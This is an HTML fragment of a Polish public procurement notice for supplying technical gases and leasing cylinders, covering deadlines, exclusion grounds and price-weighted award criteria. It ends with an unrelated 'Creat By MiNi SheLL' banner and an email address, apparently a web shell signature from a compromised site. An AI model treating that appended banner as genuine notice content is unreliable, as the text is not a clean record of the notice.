class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-03 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu w tym: nie podlegają<br/>wykluczeniu na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>2. Termin wykonania zamówienia<br/>2.1.	Okres obowiązywania umowy wynosi maksymalnie do 24 miesięcy licząc od daty zawarcia umowy, przy czym:<br/>•	dostawa gazów na podstawie zamówień częściowych będzie realizowana w okresie do 12 m-cy licząc od daty zawarcia umowy,<br/>•	okres dzierżawy każdej butli wynosi do 12 m-cy licząc od daty dostawy gazów na podstawie zamówienia częściowego.<br/>2.2.	Termin wykonania zamówień częściowych maksymalnie do 4 dni roboczych, licząc od daty przyjęcia zamówienia częściowego.<br/>2.2.1.	W przypadku braku wskazania terminu realizacji zamówień częściowych w Formularzu ofertowym Zamawiający przyjmie, że Wykonawca zaoferował maksymalny termin realizacji wskazany <br/>w niniejszym punkcie. <br/>3. Złożone oferty zostaną ocenione przez Zamawiającego w skali od 0,00 do 100,00 pkt., w oparciu o następujące kryteria: <br/><br/>Kryterium	Waga kryterium<br/>CENA 1 - wartość za dostawę gazów (suma wartości gazów w ilości gwarantowanej oraz opcjonalnej)	70%<br/>CENA 2 - wartość za dzierżawę butli (suma wartości gazów w ilości gwarantowanej oraz opcjonalnej)	30%

Creat By MiNi SheLL
Email: jattceo@gmail.com